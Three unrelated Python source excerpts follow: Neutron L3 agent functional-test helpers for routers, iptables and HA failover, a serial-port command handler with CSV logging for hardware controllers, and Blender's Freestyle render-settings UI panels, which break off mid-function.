0.0.0.0/0 via %(default_gateway_ip)s dev %(ex_device_name)s
8.8.8.0/24 via 19.4.4.4
%(extra_subnet_cidr)s dev %(ex_device_name)s scope link
}
}""") % {
'email_from': keepalived.KEEPALIVED_EMAIL_FROM,
'router_id': keepalived.KEEPALIVED_ROUTER_ID,
'ha_device_name': ha_device_name,
'ex_device_name': ex_device_name,
'external_device_cidr': external_device_cidr,
'internal_device_name': internal_device_name,
'internal_device_cidr': internal_device_cidr,
'floating_ip_cidr': floating_ip_cidr,
'default_gateway_ip': default_gateway_ip,
'int_port_ipv6': int_port_ipv6,
'ex_port_ipv6': ex_port_ipv6,
'extra_subnet_cidr': extra_subnet_cidr,
}
def _get_rule(self, iptables_manager, table, chain, predicate):
rules = iptables_manager.get_chain(table, chain)
result = next(rule for rule in rules if predicate(rule))
return result
def _assert_router_does_not_exist(self, router):
# If the namespace assertion succeeds
# then the devices and iptable rules have also been deleted,
# so there's no need to check that explicitly.
self.assertFalse(self._namespace_exists(router.ns_name))
common_utils.wait_until_true(
lambda: not self._metadata_proxy_exists(self.agent.conf, router))
def _assert_snat_chains(self, router):
self.assertFalse(router.iptables_manager.is_chain_empty(
'nat', 'snat'))
self.assertFalse(router.iptables_manager.is_chain_empty(
'nat', 'POSTROUTING'))
def _assert_floating_ip_chains(self, router, snat_bound_fip=False):
if snat_bound_fip:
self.assertFalse(router.snat_iptables_manager.is_chain_empty(
'nat', 'float-snat'))
self.assertFalse(router.iptables_manager.is_chain_empty(
'nat', 'float-snat'))
def _assert_iptables_rules_converged(self, router):
# if your code is failing on this line, it means you are not generating
# your iptables rules in the same format that iptables-save returns
# them. run iptables-save to see the format they should be in
self.assertFalse(router.iptables_manager.apply())
def _assert_metadata_chains(self, router):
metadata_port_filter = lambda rule: (
str(self.agent.conf.metadata_port) in rule.rule)
self.assertTrue(self._get_rule(router.iptables_manager,
'nat',
'PREROUTING',
metadata_port_filter))
self.assertTrue(self._get_rule(router.iptables_manager,
'filter',
'INPUT',
metadata_port_filter))
def _assert_internal_devices(self, router):
internal_devices = router.router[constants.INTERFACE_KEY]
self.assertGreater(len(internal_devices), 0)
for device in internal_devices:
self.assertTrue(self.device_exists_with_ips_and_mac(
device, router.get_internal_device_name, router.ns_name))
def _assert_extra_routes(self, router, namespace=None):
if namespace is None:
namespace = router.ns_name
routes = ip_lib.get_routing_table(4, namespace=namespace)
routes = [{'nexthop': route['nexthop'],
'destination': route['destination']} for route in routes]
for extra_route in router.router['routes']:
self.assertIn(extra_route, routes)
def _assert_onlink_subnet_routes(
self, router, ip_versions, namespace=None):
ns_name = namespace or router.ns_name
routes = []
for ip_version in ip_versions:
_routes = ip_lib.get_routing_table(ip_version,
namespace=ns_name)
routes.extend(_routes)
routes = set(route['destination'] for route in routes)
extra_subnets = router.get_ex_gw_port()['extra_subnets']
for extra_subnet in (route['cidr'] for route in extra_subnets):
self.assertIn(extra_subnet, routes)
def _assert_interfaces_deleted_from_ovs(self):
def assert_ovs_bridge_empty(bridge_name):
bridge = ovs_lib.OVSBridge(bridge_name)
self.assertFalse(bridge.get_port_name_list())
assert_ovs_bridge_empty(self.agent.conf.ovs_integration_bridge)
assert_ovs_bridge_empty(self.agent.conf.external_network_bridge)
def floating_ips_configured(self, router):
floating_ips = router.router[constants.FLOATINGIP_KEY]
external_port = router.get_ex_gw_port()
return len(floating_ips) and all(
ip_lib.device_exists_with_ips_and_mac(
router.get_external_device_name(external_port['id']),
['%s/32' % fip['floating_ip_address']],
external_port['mac_address'],
namespace=router.ns_name) for fip in floating_ips)
def _create_router(self, router_info, agent):
ns_name = "%s%s%s" % (
'qrouter-' + router_info['id'],
self.NESTED_NAMESPACE_SEPARATOR, agent.host)
ext_name = "qg-%s-%s" % (agent.host, _uuid()[-4:])
int_name = "qr-%s-%s" % (agent.host, _uuid()[-4:])
get_ns_name = mock.patch.object(
namespaces.RouterNamespace, '_get_ns_name').start()
get_ns_name.return_value = ns_name
get_ext_name = mock.patch.object(l3_router_info.RouterInfo,
'get_external_device_name').start()
get_ext_name.return_value = ext_name
get_int_name = mock.patch.object(l3_router_info.RouterInfo,
'get_internal_device_name').start()
get_int_name.return_value = int_name
router = self.manage_router(agent, router_info)
router_ext_name = mock.patch.object(router,
'get_external_device_name').start()
router_ext_name.return_value = get_ext_name.return_value
router_int_name = mock.patch.object(router,
'get_internal_device_name').start()
router_int_name.return_value = get_int_name.return_value
return router
def create_ha_routers(self):
router_info = self.generate_router_info(enable_ha=True)
router1 = self._create_router(router_info, self.agent)
self._add_fip(router1, '192.168.111.12')
r1_br = ip_lib.IPDevice(router1.driver.conf.external_network_bridge)
r1_br.addr.add('19.4.4.1/24')
r1_br.link.set_up()
router_info_2 = copy.deepcopy(router_info)
router_info_2[constants.HA_INTERFACE_KEY] = (
l3_test_common.get_ha_interface(ip='169.254.192.2',
mac='22:22:22:22:22:22'))
router2 = self._create_router(router_info_2, self.failover_agent)
r2_br = ip_lib.IPDevice(router2.driver.conf.external_network_bridge)
r2_br.addr.add('19.4.4.1/24')
r2_br.link.set_up()
return (router1, router2)
def _get_master_and_slave_routers(self, router1, router2):
try:
common_utils.wait_until_true(
lambda: router1.ha_state == 'master')
common_utils.wait_until_true(
lambda: self._check_external_device(router1))
master_router = router1
slave_router = router2
except common_utils.WaitTimeout:
common_utils.wait_until_true(
lambda: router2.ha_state == 'master')
common_utils.wait_until_true(
lambda: self._check_external_device(router2))
master_router = router2
slave_router = router1
common_utils.wait_until_true(
lambda: master_router.ha_state == 'master')
common_utils.wait_until_true(
lambda: self._check_external_device(master_router))
common_utils.wait_until_true(
lambda: slave_router.ha_state == 'backup')
return master_router, slave_router
def fail_ha_router(self, router):
device_name = router.get_ha_device_name()
ha_device = ip_lib.IPDevice(device_name, router.ha_namespace)
ha_device.link.set_down()
@staticmethod
def fail_gw_router_port(router):
r_br = ip_lib.IPDevice(router.driver.conf.external_network_bridge)
r_br.link.set_down()
@staticmethod
def restore_gw_router_port(router):
r_br = ip_lib.IPDevice(router.driver.conf.external_network_bridge)
r_br.link.set_up()
@classmethod
def _get_addresses_on_device(cls, namespace, interface):
return [address['cidr'] for address in
ip_lib.IPDevice(interface, namespace=namespace).addr.list()]
def _assert_no_ip_addresses_on_interface(self, namespace, interface):
self.assertEqual(
[], self._get_addresses_on_device(namespace, interface))
def _assert_ip_addresses_on_interface(self,
namespace, interface, ip_addresses):
for ip_address in ip_addresses:
self._assert_ip_address_on_interface(namespace, interface,
ip_address)
def _assert_ip_address_on_interface(self,
namespace, interface, ip_address):
self.assertIn(
ip_address, self._get_addresses_on_device(namespace, interface))
def _assert_ping_reply_from_expected_address(
self, ping_result, expected_address):
ping_results = ping_result.split('\n')
self.assertGreater(
len(ping_results), 1,
"The result from ping should be multiple lines")
self.assertIn(
expected_address, ping_results[1],
("Expect to see %s in the reply of ping, but failed" %
expected_address))
|
import serial
import time
from datetime import datetime
import sys
import os
import yaml
import csv
import re
from validate_commands import CommandValidator
def build_cmd_string(command, values=None, format="%0.3f"):
txt = command
if values is not None:
#print("%s \t %s"%(command, values))
if isinstance(values, list) or isinstance(values, tuple):
if values:
for val in values:
txt+= ";"+format%(val)
else:
txt+=";"+format%(values)
cmd = txt+'\n'
return cmd
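# build_cmd_string example (hypothetical command name): build_cmd_string('SETPOS', [1.0, 2.5])
# returns 'SETPOS;1.000;2.500\n'; build_cmd_string('QUERY') returns 'QUERY\n'.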
class CommandHandler:
def __init__(self, comm_list):
self.comm_list = comm_list
self.validators = []
self.num_chans = []
self.cmd_specs = []
for settings in self.comm_list:
self.num_chans.append(settings['num_channels'])
self.cmd_specs.append(settings['cmd_spec'])
self.validators.append(CommandValidator(settings["cmd_spec"], settings["num_channels"]))
def split_command(self, command, values, format="%0.3f"):
commands_out = []
for idx,_ in enumerate(self.comm_list):
spec = self.validators[idx].get_spec(command)
if spec is None:
split_how = None
else:
split_how = spec.get('split_how',None)
split_idx = None
switch_idx = None
# If we are not splitting the command, send the same thing to each controller
if split_how == None:
commands_out.append({'command':command, 'values':values})
# If we are splitting the command, determine how
else:
if isinstance(values,list) or isinstance(values,tuple):
values = list(values)
if len(values) ==0:
commands_out.append({'command':command, 'values':values})
continue
split_how_single = split_how.get('single_arg',None)
if spec['num_args'][0] == len(values):
if split_how_single is None:
commands_out.append({'command':command, 'values':values})
elif 'channel' in split_how_single:
channel = 0
split_idx = eval(split_how_single)
elif 'idx' in split_how_single:
channel = 0
switch_idx = int(re.match('.*?([0-9]+)$', split_how_single).group(1))
else:
commands_out.append(None)
else:
split_how_multi = split_how.get('multi_arg',None)
if split_how_multi is None:
commands_out.append({'command':command, 'values':values})
elif 'channel' in split_how_multi:
channel = 0
split_idx = eval(split_how_multi)
elif 'idx' in split_how_multi:
channel = 0
                            switch_idx = int(re.match('.*?([0-9]+)$', split_how_multi).group(1))
else:
commands_out.append(None)
else:
commands_out.append({'command':command, 'values':values})
max_chan = sum(self.num_chans[0:idx+1])
min_chan = sum(self.num_chans[0:idx])
if split_idx is not None:
curr_vals = values[0:split_idx]
if len(values) >=max_chan+split_idx:
curr_vals.extend(values[min_chan+split_idx:max_chan+split_idx])
else:
curr_vals.extend(values[min_chan+split_idx:])
commands_out.append({'command':command, 'values':curr_vals})
elif switch_idx is not None:
if values[switch_idx] < max_chan and values[switch_idx] >= min_chan:
values[switch_idx] = float(values[switch_idx]) - min_chan
commands_out.append({'command':command, 'values':values})
else:
commands_out.append(None)
return commands_out
class CommHandler:
def __init__(self):
self.serial_settings = None
self.s = None
def initialize(self, devname=None, baudrate=None, ser=None):
if devname is not None and baudrate is not None:
self.s = [serial.Serial(devname,baudrate)]
elif ser is not None:
self.s = [ser]
elif self.serial_settings is not None:
self.s = []
for settings in self.serial_settings:
self.s.append(serial.Serial(settings["devname"], settings["baudrate"]))
else:
self.s = None
            raise ValueError("CommHandler expects either a devname and baudrate, or an existing serial object")
self.command_handler=CommandHandler(self.serial_settings)
self.validator = []
self.loggers = []
for idx, settings in enumerate(self.serial_settings):
validator_curr = self.command_handler.validators[idx]
self.validator.append(validator_curr)
self.loggers.append(DataSaver(settings,validator_curr))
# Get serial settings from a file
def read_serial_settings(self, file=None):
file_path = os.path.dirname(os.path.realpath(__file__))
if file is None:
file=os.path.join(file_path,"..","config","comms","comms_config.yaml")
with open(file) as f:
# use safe_load instead of load
hardware_settings = yaml.safe_load(f)
f.close()
hw_file = hardware_settings.get('hardware')
devnames = hardware_settings.get('devnames')
hw_fullfile=os.path.join(file_path,"..","config","hardware",hw_file+".yaml")
with open(hw_fullfile) as f:
# use safe_load instead of load
serial_settings = yaml.safe_load(f)
f.close()
for idx, obj in enumerate(serial_settings):
obj['devname'] = devnames[idx]
self.serial_settings = serial_settings
return serial_settings
    # Get serial settings
def get_serial_settings(self):
return self.serial_settings
# Set serial settings directly
def set_serial_settings(self, serial_settings):
self.serial_settings=serial_settings
# Send commands out
def send_command(self, command, values=None, format="%0.3f"):
cmd_obj = self.command_handler.split_command(command, values)
cmd = []
for cmd_curr in cmd_obj:
if cmd_curr is None:
cmd.append(None)
else:
cmd.append(build_cmd_string(cmd_curr['command'], cmd_curr['values'], format) )
print(cmd, len(cmd))
for ser, cmd_curr in zip(self.s,cmd):
if cmd_curr is not None:
ser.write(cmd_curr.encode())
# Send a raw string out
def send_string(self, string, eol='\n'):
string+=eol
for ser in self.s:
ser.write(string.encode())
# Read one line
def read_line(self, display=False, raw=False):
out=[None]*len(self.s)
for idx,ser in enumerate(self.s):
curr_line = None
if ser.in_waiting: # Or: while ser.inWaiting():
curr_line = ser.readline().decode().strip()
out[idx] = curr_line
if curr_line is not None and display:
print(curr_line)
if out == [None]*len(self.s):
return None
elif raw:
return out
else:
new_out = []
for idx,_ in enumerate(out):
line = self.validator[idx].process_line(out[idx])
if line is None:
new_out.append(None)
else:
new_out.append(line[0])
if new_out == [None]*len(self.s):
return None
return new_out
def read_all(self, display=False, raw=False):
out = []
new_line = []
        while new_line is not None: # Or: while ser.inWaiting():
new_line = self.read_line(display, raw)
if new_line is not None:
out.append(new_line)
if len(out) ==0:
return None
else:
return out
def save_init(self, filename, filetype='csv'):
for idx,logger in enumerate(self.loggers):
file, file_extension = os.path.splitext(filename)
logger.save_init(file+"_%02d"%(idx)+file_extension,filetype)
def save_data_lines(self,data_lines):
for line in data_lines:
self.save_data_line(line)
def save_data_line(self,data_line):
for idx, _ in enumerate(self.serial_settings):
self.loggers[idx].save_data_line(data_line[idx])
# Upon shutdown, close the serial instance
def shutdown(self):
if self.s is not None:
for ser in self.s:
ser.close()
for logger in self.loggers:
logger.shutdown()
# Upon object deletion, shut down the serial handler
def __del__(self):
self.shutdown()
class DataSaver:
def __init__(self, serial_settings, validator):
self.serial_settings = serial_settings
self.validator = validator
self.out_file = None
self.file_writer = None
def save_init(self, filename, filetype='csv'):
num_channels = self.serial_settings['num_channels']
data_to_save = self.validator.cmd_data['types'].keys()
data_flat_labels = ['time']
data_labels = ['time']
data_lens = [1]
for data_type in data_to_save:
curr_type = self.validator.cmd_data['types'][data_type]
curr_label = curr_type['label']
curr_len = curr_type['length']
if curr_len == 'num_channels':
curr_len = num_channels
data_labels.append(curr_label)
data_lens.append(curr_len)
if curr_len>1:
for idx in range(curr_len):
data_flat_labels.append(curr_label+"[%d]"%(idx))
else:
data_flat_labels.append(curr_label)
data_labels.extend(['_command', '_args'])
data_flat_labels.extend(['_command', '_args'])
data_lens.extend([1,1])
self.data_to_save = data_to_save
self.data_labels = data_labels
self.data_lens = data_lens
self.data_flat_labels = data_flat_labels
self.out_file = open(filename, "w+")
self.file_writer = csv.writer(self.out_file)
self.file_writer.writerow(self.data_flat_labels)
def save_data_lines(self,data_lines):
for line in data_lines:
self.save_data_line(line)
def save_data_line(self,data_line):
try:
if data_line is None:
return
data=[]
for idx,key in enumerate(self.data_labels):
expected_len = self.data_lens[idx]
dat = data_line.get(key,None)
if isinstance(dat, list):
for curr_dat in dat:
data.append(curr_dat)
if expected_len > len(dat):
for idx in range(expected_len-len(dat)):
data.append("")
if expected_len < len(dat):
print("data array is longer than we expected")
elif dat is not None:
data.append(dat)
else:
for idx in range(expected_len):
data.append("")
self.file_writer.writerow(data)
except IOError:
print("I/O error")
# Upon shutdown, close the serial instance
def shutdown(self):
if self.out_file is not None:
self.out_file.close()
def __del__(self):
self.shutdown()
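# Minimal usage sketch (the 'SETPOS' command is hypothetical; assumes
# config/comms/comms_config.yaml describes the attached controllers):
#   comms = CommHandler()
#   comms.read_serial_settings()
#   comms.initialize()
#   comms.send_command('SETPOS', [1.0, 2.0, 3.0])
#   lines = comms.read_all(display=True)
#   comms.shutdown()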
|
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
# <pep8 compliant>
import bpy
from bpy.types import Menu, Panel, UIList
# Render properties
class RenderFreestyleButtonsPanel:
bl_space_type = 'PROPERTIES'
bl_region_type = 'WINDOW'
bl_context = "render"
# COMPAT_ENGINES must be defined in each subclass, external engines can add themselves here
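    # e.g. an external engine's add-on may call
    # RENDER_PT_freestyle.COMPAT_ENGINES.add('MY_EXTERNAL_ENGINE') at registration
    # (engine id is hypothetical).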
@classmethod
def poll(cls, context):
scene = context.scene
with_freestyle = bpy.app.build_options.freestyle
        return scene and with_freestyle and (context.engine in cls.COMPAT_ENGINES)
class RENDER_PT_freestyle(RenderFreestyleButtonsPanel, Panel):
bl_label = "Freestyle"
bl_options = {'DEFAULT_CLOSED'}
bl_order = 10
COMPAT_ENGINES = {'BLENDER_RENDER', 'BLENDER_EEVEE'}
def draw_header(self, context):
rd = context.scene.render
self.layout.prop(rd, "use_freestyle", text="")
def draw(self, context):
layout = self.layout
layout.use_property_split = True
layout.use_property_decorate = False # No animation.
rd = context.scene.render
layout.active = rd.use_freestyle
layout.prop(rd, "line_thickness_mode", expand=True)
if rd.line_thickness_mode == 'ABSOLUTE':
layout.prop(rd, "line_thickness")
# Render layer properties
class ViewLayerFreestyleButtonsPanel:
bl_space_type = 'PROPERTIES'
bl_region_type = 'WINDOW'
bl_context = "view_layer"
bl_order = 10
# COMPAT_ENGINES must be defined in each subclass, external engines can add themselves here
@classmethod
def poll(cls, context):
scene = context.scene
rd = scene.render
with_freestyle = bpy.app.build_options.freestyle
return (scene and with_freestyle and rd.use_freestyle and
(context.engine in cls.COMPAT_ENGINES))
class ViewLayerFreestyleEditorButtonsPanel(ViewLayerFreestyleButtonsPanel):
# COMPAT_ENGINES must be defined in each subclass, external engines can add themselves here
@classmethod
def poll(cls, context):
if not super().poll(context):
return False
view_layer = context.view_layer
return view_layer and view_layer.freestyle_settings.mode == 'EDITOR'
class VIEWLAYER_UL_linesets(UIList):
def draw_item(self, _context, layout, _data, item, icon, _active_data, _active_propname, index):
lineset = item
if self.layout_type in {'DEFAULT', 'COMPACT'}:
layout.prop(lineset, "name", text="", emboss=False, icon_value=icon)
layout.prop(lineset, "show_render", text="", index=index)
elif self.layout_type == 'GRID':
layout.alignment = 'CENTER'
layout.label(text="", icon_value=icon)
class RENDER_MT_lineset_context_menu(Menu):
bl_label = "Lineset Specials"
def draw(self, _context):
layout = self.layout
layout.operator("scene.freestyle_lineset_copy", icon='COPYDOWN')
layout.operator("scene.freestyle_lineset_paste", icon='PASTEDOWN')
class VIEWLAYER_PT_freestyle(ViewLayerFreestyleButtonsPanel, Panel):
bl_label = "Freestyle"
COMPAT_ENGINES = {'BLENDER_RENDER', 'BLENDER_EEVEE'}
def draw(self, context):
layout = self.layout
view_layer = context.view_layer
freestyle = view_layer.freestyle_settings
layout.active = view_layer.use_freestyle
row = layout.row()
layout.prop(freestyle, "mode", text="Control Mode")
layout.prop(freestyle, "use_view_map_cache", text="View Map Cache")
layout.prop(freestyle, "as_render_pass", text="As Render Pass")
layout.label(text="Edge Detection Options:")
split = layout.split()
col = split.column()
col.prop(freestyle, "crease_angle")
col.prop(freestyle, "use_culling")
col.prop(freestyle, "use_advanced_options")
col = split.column()
col.prop(freestyle, "use_smoothness")
if freestyle.mode == 'SCRIPT':
col.prop(freestyle, "use_material_boundaries")
# Advanced options are hidden by default to warn new users
if freestyle.use_advanced_options:
if freestyle.mode == 'SCRIPT':
row = layout.row()
row.prop(freestyle, "use_ridges_and_valleys")
row.prop(freestyle, "use_suggestive_contours")
row = layout.row()
row.prop(freestyle, "sphere_radius")
row.prop(freestyle, "kr_derivative_epsilon")
if freestyle.mode == 'SCRIPT':
row = layout.row()
row.label(text="Style modules:")
row.operator("scene.freestyle_module_add", text="Add")
for module in freestyle.modules:
box = layout.box()
box.context_pointer_set("freestyle_module", module)
row = box.row(align=True)
row.prop(module, "use", text="")
row.prop(module, "script", text="")
row.operator("scene.freestyle_module_open", icon='FILEBROWSER', text="")
row.operator("scene.freestyle_module_remove", icon='X', text="")
row.operator("scene.freestyle_module_move", icon='TRIA_UP', text="").direction = 'UP'
row.operator("scene.freestyle_module_move", icon='TRIA_DOWN', text="").direction = 'DOWN'
class VIEWLAYER_PT_freestyle_lineset(ViewLayerFreestyleEditorButtonsPanel, Panel):
bl_label = "Freestyle Line Set"
COMPAT_ENGINES = {'BLENDER_RENDER', 'BLENDER_EEVEE'}
def draw_edge_type_buttons(self, box, lineset, edge_type):
# property names
select_edge_type = "select_" + edge_type
exclude_edge_type = "exclude_" + edge_type
# draw edge type buttons
row = box.row(align=True)
row.prop(lineset, select_edge_type)
sub = row.column(align=True)
sub.prop(lineset, exclude_edge_type, text="")
sub.active = getattr(lineset, select_edge_type)
def draw(self, context):
layout = self.layout
view_layer = context.view_layer
freestyle = view_layer.freestyle_settings
lineset = freestyle.linesets.active
layout.active = view_layer.use_freestyle
row = layout.row()
rows = 4 if lineset else 2
row.template_list(
"VIEWLAYER_UL_linesets",
"",
freestyle,
"linesets",
freestyle.linesets,
"active_index",
rows=rows,
)
sub = row.column(align=True)
sub.operator("scene.freestyle_lineset_add", icon='ADD', text="")
sub.operator("scene.freestyle_lineset_remove", icon='REMOVE', text="")
sub.menu("RENDER_MT_lineset_context_menu", icon='DOWNARROW_HLT', text="")
if lineset:
sub.separator()
sub.separator()
sub.operator("scene.freestyle_lineset_move", icon='TRIA_UP', text="").direction = 'UP'
sub.operator("scene.freestyle_lineset_move", icon='TRIA_DOWN', text="").direction = 'DOWN'
col = layout.column()
col.label(text="Selection By:")
row = col.row(align=True)
row.prop(lineset, "select_by_visibility", text="Visibility", toggle=True)
row.prop(lineset, "select_by_edge_types", text="Edge Types", toggle=True)
row.prop(lineset, "select_by_face_marks", text="Face Marks", toggle=True)
row.prop(lineset, "select_by_collection", text="Collection", toggle=True)
row.prop(lineset, "select_by_image_border", text="Image Border", toggle=True)
if lineset.select_by_visibility:
col.label(text="Visibility:")
row = col.row(align=True)
row.prop(lineset, "visibility", expand=True)
if lineset.visibility == 'RANGE':
row = col.row(align=True)
row.prop(lineset, "qi_start")
row.prop(lineset, "qi_end")
if lineset.select_by_edge_types:
col.label(text="Edge Types:")
row = col.row()
row.prop(lineset, "edge_type_negation", expand=True)
row.prop(lineset, "edge_type_combination", expand=True)
split = col.split()
sub = split.column()
self.draw_edge_type_buttons(sub, lineset, "silhouette")
self.draw_edge_type_buttons(sub, lineset, "border")
self.draw_edge_type_buttons(sub, lineset, "contour")
self.draw_edge_type_buttons(sub, lineset, "suggestive_contour")
self.draw_edge_type_buttons(sub, lineset, "ridge_valley")
sub = split.column()
self.draw_edge_type_buttons(sub, lineset, "crease")
self.draw_edge_type_buttons(sub, lineset, "edge_mark")
self.draw_edge_type_buttons(sub, lineset, "external_contour")
self.draw_edge_type_buttons(sub, lineset, "material_boundary")
if lineset.select_by_face_marks:
col.label(text="Face Marks:")
row = col.row()
row.prop(lineset, "face_mark_negation", expand=True)
row.prop(lineset, "face_mark_condition", expand=True)
if lineset.select_by_collection:
col.label(text="Collection:")
row = col.row()
row.prop(lineset, "collection", text="")
row.prop(lineset, "collection_negation", expand=True)
class VIEWLAYER_PT_freestyle_linestyle(ViewLayerFreestyleEditorButtonsPanel, Panel):
bl_label = "Freestyle Line Style"
bl_options = {'DEFAULT_CLOSED'}
COMPAT_ENGINES = {'BLENDER_RENDER', 'BLENDER_EEVEE'}
def draw_modifier_box_header(self, box, modifier):
row = box.row()
row.context_pointer_set("modifier", modifier)
if modifier.expanded:
icon = 'TRIA_DOWN'
else:
icon = 'TRIA_RIGHT'
row.prop(modifier, "expanded", text="", icon=icon, emboss=False)
# TODO: Use icons rather than text label, would save some room!
row.label(text=modifier.rna_type.name)
row.prop(modifier, "name", text="")
if modifier.use:
icon = 'RESTRICT_RENDER_OFF'
else:
icon = 'RESTRICT_RENDER_ON'
row.prop(modifier, "use", text="", icon=icon)
sub = row.row(align=True)
sub.operator("scene.freestyle_modifier_copy", icon='NONE', text="Copy")
sub.operator("scene.freestyle_modifier_move", icon='TRIA_UP', text="").direction = 'UP'
sub.operator("scene.freestyle_modifier_move", icon='TRIA_DOWN', text="").direction = 'DOWN'
sub.operator("scene.freestyle_modifier_remove", icon='X', text="")
def draw_modifier_box_error(self, box, _modifier, message):
row = box.row()
row.label(text=message, icon='ERROR')
def draw_modifier_common(self, box, modifier):
row = box.row()
row.prop(modifier, "blend", text="")
row.prop(modifier, "influence")
def draw_modifier_color_ramp_common(self, box, modifier, has_range):
box.template_color_ramp(modifier, "color_ramp", expand=True)
if has_range:
row = box.row(align=True)
row.prop(modifier, "range_min")
row.prop(modifier, "range_max")
def draw_modifier_curve_common(self, box, modifier, has_range, has_value):
row = box.row()
row.prop(modifier, "mapping", text="")
sub = row.column()
sub.prop(modifier, "invert")
if modifier.mapping == 'CURVE':
sub.active = False
box.template_curve_mapping(modifier, "curve")
if has_range:
row = box.row(align=True)
row.prop(modifier, "range_min")
row.prop(modifier, "range_max")
if has_value:
row = box.row(align=True)
row.prop(modifier, "value_min")
row.prop(modifier, "value_max")
def draw_color_modifier(self, context, modifier):
layout = self.layout
col = layout.column(align=True)
self.draw_modifier_box_header(col.box(), modifier)
if modifier.expanded:
box = col.box()
self.draw_modifier_common(box, modifier)
if modifier.type == 'ALONG_STROKE':
self.draw_modifier_color_ramp_common(box, modifier, False)
elif modifier.type == 'DISTANCE_FROM_OBJECT':
box.prop(modifier, "target")
self.draw_modifier_color_ramp_common(box, modifier, True)
prop = box.operator("scene.freestyle_fill_range_by_selection")
prop.type = 'COLOR'
prop.name = modifier.name
elif modifier.type == 'DISTANCE_FROM_CAMERA':
self.draw_modifier_color_ramp_common(box, modifier, True)
prop = box.operator("scene.freestyle_fill_range_by_selection")
prop.type = 'COLOR'
prop.name = modifier.name
elif modifier.type == 'MATERIAL':
row = box.row()
row.prop(modifier, "material_attribute", text="")
sub = row.column()
sub.prop(modifier, "use_ramp")
if modifier.material_attribute in {'LINE', 'DIFF', 'SPEC'}:
sub.active = True
show_ramp = modifier.use_ramp
else:
sub.active = False
show_ramp = True
if show_ramp:
self.draw_modifier_color_ramp_common(box, modifier, False)
elif modifier.type == 'TANGENT':
self.draw_modifier_color_ramp_common(box, modifier, False)
elif modifier.type == 'NOISE':
self.draw_modifier_color_ramp_common(box, modifier, False)
row = box.row(align=False)
row.prop(modifier, "amplitude")
row.prop(modifier, "period")
row.prop(modifier, "seed")
elif modifier.type == 'CREASE_ANGLE':
self.draw_modifier_color_ramp_common(box, modifier, False)
row = box.row(align=True)
row.prop(modifier, "angle_min")
row.prop(modifier, "angle_max")
elif modifier.type == 'CURVATURE_3D':
self.draw_modifier_color_ramp_common(box, modifier, False)
row = box.row(align=True)
row.prop(modifier, "curvature_min")
row.prop(modifier, "curvature_max")
freestyle = context.view_layer.freestyle_settings
if not freestyle.use_smoothness:
message = "Enable Face Smoothness to use this modifier"
self.draw_modifier_box_error(col.box(), modifier, message)
def draw_alpha_modifier(self, context, modifier):
layout = self.layout
col = layout.column(align=True)
self.draw_modifier_box_header(col.box(), modifier)
if modifier.expanded:
box = col.box()
self.draw_modifier_common(box, modifier)
if modifier.type == 'ALONG_STROKE':
self.draw_modifier_curve_common(box, modifier, False, False)
elif modifier.type == 'DISTANCE_FROM_OBJECT':
box.prop(modifier, "target")
self.draw_modifier_curve_common(box, modifier, True, False)
prop = box.operator("scene.freestyle_fill_range_by_selection")
prop.type = 'ALPHA'
prop.name = modifier.name
elif modifier.type == 'DISTANCE_FROM_CAMERA':
self.draw_modifier_curve_common(box, modifier, True, False)
prop = box.operator("scene.freestyle_fill_range_by_selection")
prop.type = 'ALPHA'
prop.name = modifier.name
elif modifier.type == 'MATERIAL':
box.prop(modifier, "material_attribute", text="")
self.draw_modifier_curve_common(box, modifier, False, False)
elif modifier.type == 'TANGENT':
self.draw_modifier_curve_common(box, modifier, False, False)
elif modifier.type == 'NOISE':
self.draw_modifier_curve_common(box, modifier, False, False)
row = box.row(align=False)
row.prop(modifier, "amplitude")
row.prop(modifier, "period")
row.prop(modifier, "seed")
elif modifier.type == 'CREASE_ANGLE':
self.draw_modifier_curve_common(box, modifier, False, False)
row = box.row(align=True)
row.prop(modifier, "angle_min")
row.prop(modifier, "angle_max")
elif modifier.type == 'CURVATURE_3D':
self.draw_modifier_curve_common(box, modifier, False, False)
row = box.row(align=True)
row.prop(modifier, "curvature_min")
row.prop(modifier, "curvature_max")
freestyle = context.view_layer.freestyle_settings
if not freestyle.use_smoothness:
message = "Enable Face Smoothness to use this modifier"
self.draw_modifier_box_error(col.box(), modifier, message)
def draw_thickness_modifier(self, context, modifier):
layout = self.layout
col = layout.column(align=True)
self.draw_modifier_box_header(col.box(), modifier)
if modifier.expanded:
box = col.box()
self.draw_modifier_common(box, modifier)
if modifier.type == 'ALONG_STROKE':
self.draw_modifier_curve_common(box, modifier, False, True)
elif modifier.type == 'DISTANCE_FROM_OBJECT':
box.prop(modifier, "target")
self.draw_modifier_curve_common(box, modifier, True, True)
prop = box.operator("scene.freestyle_fill_range_by_selection")
prop.type = 'THICKNESS'
prop.name = modifier.name
elif modifier.type == 'DISTANCE_FROM_CAMERA':
self.draw_modifier_curve_common(box, modifier, True, True)
prop = box.operator("scene.freestyle_fill_range_by_selection")
prop.type = 'THICKNESS'
prop.name = modifier.name
elif modifier.type == 'MATERIAL':
box.prop(modifier, "material_attribute", text="")
self.draw_modifier_curve_common(box, modifier, False, True)
elif modifier.type == 'CALLIGRAPHY':
box.prop(modifier, "orientation")
row = box.row(align=True)
row.prop(modifier, "thickness_min")
row.prop(modifier, "thickness_max")
elif modifier.type == 'TANGENT':
self.draw_modifier_curve_common(box, modifier, False, False)
self.mapping = 'CURVE'
row = box.row(align=True)
row.prop(modifier, "thickness_min")
row.prop(modifier, "thickness_max")
elif modifier.type == 'NOISE':
row = box.row(align=False)
row.prop(modifier, "amplitude")
row.prop(modifier, "period")
row = box.row(align=False)
row.prop(modifier, "seed")
row.prop(modifier, "use_asymmetric")
elif modifier.type == 'CREASE_ANGLE':
self.draw_modifier_curve_common(box, modifier, False, False)
row = box.row(align=True)
row.prop(modifier, "thickness_min")
row.prop(modifier, "thickness_max")
row = box.row(align=True)
row.prop(modifier, "angle_min")
row.prop(modifier, "angle_max")
elif modifier.type == 'CURVATURE_3D':
self.draw_modifier_curve_common(box, modifier, False, False)
row = box.row(align=True)
row.prop(modifier, "thickness_min")
